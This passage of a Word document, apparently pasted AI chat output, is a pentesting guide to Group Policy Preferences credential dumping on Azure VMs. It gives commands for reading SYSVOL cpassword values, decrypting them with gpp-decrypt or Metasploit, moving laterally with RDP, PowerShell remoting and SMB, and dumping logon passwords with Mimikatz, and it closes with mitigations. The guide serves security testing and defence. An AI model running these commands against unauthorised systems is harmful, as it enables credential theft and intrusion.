    <w:p w14:paraId="634C0D31" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>net view \\&lt;DOMAIN-CONTROLLER-IP&gt;\SYSVOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A2FB92" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Navigate to the Group Policy path holding preferences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A0A06" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>\\&lt;DOMAIN-CONTROLLER-IP&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F56EE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Download or view the Groups.xml file, which contains lines like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236BEA0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>&lt;cpassword&gt;EncryptedPasswordHere&lt;/cpassword&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393BFBFB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="4C6B498E">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3EAFC3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3. Decrypt the Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E9B509" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use publicly available tools to decrypt cpassword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D31B5F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Option A: Using gpp-decrypt.py (Python script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CDE428" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>gpp-decrypt.py Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B68170" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Outputs plaintext passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72907449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Option B: Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACA031E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>use auxiliary/gather/credentials/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E64D46" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set RHOSTS &lt;DomainController-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F32D2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD8B90" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>This module automates fetching and decrypting GPP passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FF519" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="4AF1B569">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A7521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4. Use Extracted Credentials for Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC63E8" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>With decrypted credentials, authenticate to Azure VMs using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52518AEE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># For Windows VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4BA986" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>rdesktop &lt;VM-IP&gt; -u raaz -p &lt;decrypted-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB34415" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="4A47C1A1" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># For PowerShell remoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC1BD3" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>Enter-PSSession -ComputerName &lt;VM-IP&gt; -Credential raaz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40243B6E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="4908B344" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># For SMB access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD21C67" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>smbclient -L //&lt;VM-IP&gt; -U raaz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3098A06B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Perform further post-exploitation like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EEC3B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># On compromised VM, dump more credentials with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C97896" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23F492" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="35C95B68">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A7C67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5. Azure VM Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32333C88" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSVOL Permissions:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>Read access to SYSVOL by authenticated users exposes passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A60153" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Poor Password Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>GPP stores passwords encrypted with a static key, not secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DB7C6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Exposure:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>Azure VMs in the same virtual network or subnet allow lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0130E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak Azure RBAC and NSG Rules:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>Lack of proper network security groups or role restrictions lets attackers move across resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177B7AF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insufficient Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:br/>
        <w:t>No alerting on abnormal SYSVOL access or GPP exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE85DF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="08C46B98">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F298ED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4394"/>
        <w:gridCol w:w="4229"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="3DADD9CE" w14:textId="77777777" w:rsidTr="003955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17891" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B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2DB1C8E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697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AE3512C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command/Tool Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="3FB5C03D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97EFD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>1. Create GPP User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D990DF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Via GPMC, create local user with password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F977024" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>GUI in Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="1070CAAC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CAF9D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>2. Access SYSVOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2809F081" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Access Group.xml containing cpassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="205C4FDE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>net view \\&lt;DC-IP&gt;\SYSVOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="3BAC122C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BE5DA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>3. Decrypt Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="134DACF9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use tools to decrypt cpassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F17897" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>gpp-decrypt.py Groups.xml or Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="442F4C6F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1E93E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>4. Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="229DBF66" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use credentials to access Azure VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18C477A9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>rdesktop, Enter-PSSession, smbclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="08606DDD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42772" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>5. Post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FBA3A8B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Dump more creds or escalate privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2664E98C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Invoke-Mimikatz, PowerShell Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76636E21" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="72604C48">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84E6B1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Important Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0892F423" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do not use GPP for password storage anymore.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Microsoft deprecated this in 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACA268" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Regularly audit SYSVOL for legacy GPP XML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF3264" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Defender</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> and monitoring tools to alert on suspicious SYSVOL access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D1286" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least privilege principles</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> and network segmentation in Azure environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DC839D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Rotate local admin passwords and enforce strong policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B1C4D9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="735B4A7C">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9961E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>If you want, I can prepare a detailed automated pentesting playbook with exact commands, PowerShell scripts, and Azure CLI steps for this attack vector. Just ask!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060DC35" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB" w:rsidP="00C311DB"/>
    <w:p w14:paraId="0EECB8E5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Certainly! Here’s a cleaned-up, concise, and detailed summary of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how to pentest Azure Windows/Linux VMs for Local accounts, AD accounts, and Microsoft Entra ID accounts via Credential Dumping from Group Policy Preferences (GPP)</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> — including detailed steps, commands, exploited vulnerabilities, and multiple exploitation methods without duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DE24A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="10455948">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5EF418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Pentesting Credential Dumping via Group Policy Preferences (GPP) on Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C713EF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="4F7ED7BA">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B54A225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Background: Why GPP Credentials Are Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DD5BFA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Group Policy Preferences (GPP) can create local/domain users and set passwords via Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E6D4C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Passwords are stored encrypted in XML files (Groups.xml) inside </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> folder on Domain Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D53D088" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SYSVOL is readable by </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any authenticated domain user</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373B5AA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
